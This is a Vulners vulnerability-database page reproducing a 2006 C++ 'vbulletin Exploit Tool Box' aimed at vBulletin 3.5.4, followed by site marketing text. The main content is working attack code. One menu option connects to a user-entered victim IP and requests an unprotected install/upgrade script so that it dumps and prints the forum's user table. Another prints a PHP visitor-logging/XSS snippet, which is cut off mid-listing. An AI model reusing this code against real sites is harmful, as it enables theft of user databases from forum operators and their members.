Vulners
Lucene search
vbulletin Exploit Tool Box
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#include <string.h>
#include <iostream>
using namespace std;
string exploit;
string answer;
string answer2;
long s;
sockaddr_in addr;
char IPaddr[1024];
/*You have to change to the right path*/
char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n";
char stry[41943040];
long I;
long M, J, K, L;
int i;
int main()
{
cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl;
cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl;
cout << "> Press 1 for Install_path exploit" << endl;
cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl;
cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl;
cout << "> Programm Author M4k3, www.pldsoft.com" << endl;
cout << "> Copyright by PLDsoft.com" << endl;
cout << "> Number? "; cin >> exploit;
cout << endl;
if (exploit == "1")
{
cout << " ____________________ " << endl;
cout << " |---PLDsoft.com------|" << endl;
cout << " |--------------------|" << endl;
cout << " |-vbulletin 3.5.4---|" << endl;
cout << " |install_path exploit|" << endl;
cout << " |____________________|" << endl;
cout << "##############################################" << endl;
cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl;
cout << "###############################################" << endl;
cout << endl;
cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl;
cout << "Remote : Yes" << endl;
cout << "Critical Level : Dangerous"<< endl;
cout << "############################################" << endl;
cout << "Affected software description :" << endl;
cout << endl;
cout << "Application : vbulletin" << endl;
cout << "version : latest version [ 3.60 Release 4 ]" << endl;
cout << "URL : http://www.vbulletin.com" << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Exploit:" << endl;
cout << endl;
cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl;
cout << endl;
cout << "when it works, you can download the database..." << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Contact:" << endl;
cout << "Nick: M4k3" << endl;
cout << "E-mail: [email protected]" << endl;
cout << "Website: http://www.pldsoft.com" << endl;
cout << "_______End of Exploit______" << endl;
cout << endl;
sleep(1);
cout << "Use the exploit now?" << endl;
cout << "yes/no: "; cin >> answer;
}
if (answer == "yes")
{
cout << "Starting vbulletin 3.5.4 install_path exploit" << endl;
{
cout << "Insert IP: "; cin >> IPaddr;
M = 0;
J = 0;
K = 0;
L = 0;
while(IPaddr[i] != 0)
{
if(IPaddr[i] >= '0' && IPaddr[i] <= '9')
{
L *= 10;
L += IPaddr[i] - '0';
K++;
if(K > 3)
{
M = -1;
break;
}
}
else if(IPaddr[i] == '.')
{
if(K == 0)
{
M = -1;
break;
}
if(L >= 255)
{
M = -1;
break;
}
J++;
K = 0;
L = 0;
}
else
{
M = -1;
break;
}
M++;
}
if(M == -1 || J != 3)
{
cout << "> Invalid IP-Address!" << endl;
return 0;
}
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
addr.sin_family = AF_INET;
inet_aton(IPaddr, &addr.sin_addr);
addr.sin_port = htons(80);
if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in)))
{
printf("Failure: Connection Rested!\r\n");
close(s);
return 1;
}
if(send(s, sget, strlen(sget), 0) == 0)
{
printf("Failure: Not able to send packets!\r\n");
close(s);
return 2;
}
if((I = recv(s, stry, 41943040, 0)) == 0)
{
printf("Failure: Not able to receive packets!\r\n");
close(s);
return 3;
return 0;
}
close(s);
printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I);
printf("%s", stry);
return 0;
}
}
else if (exploit == "2")
{
cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl;
cout << "=> Author: SpiderZ"<< endl;
cout << "=> Sito: www.spiderz.tk"<< endl;
cout << endl;
cout << "_____________________________________________________________"<< endl;
cout << endl;
cout << "( 1 )"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$ip_adresse = $_SERVER['REMOTE_ADDR']; "<< endl;
cout << "if(!empty($ip_adresse)) "<< endl;
cout << "{ "<< endl;
cout << "echo 'il tuo ip ?: ',$ip_adresse; "<< endl;
cout << "} "<< endl;
cout << "else "<< endl;
cout << "{ "<< endl;
cout << "echo 'Impossible d\'afficher l\'IP'; "<< endl;
cout << "} "<< endl;
cout << "?> "<< endl;
cout << endl;
cout << "<a href=""log.php""></a><?"<< endl;
cout << "$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];"<< endl;
cout << "$day = date(""d"",time()); $month = date(""m"",time()); $year = date(""Y"",time());"<< endl;
cout << "if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;"<< endl;
cout << "else $visitor_info = $REMOTE_HOST;"<< endl;
cout << "$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;"<< endl;
cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl;
cout << "$x2=$REMOTE_PORT;"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "<?php"<< endl;
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Oct 2006 00:00Current
7.1High risk
Vulners AI Score7.1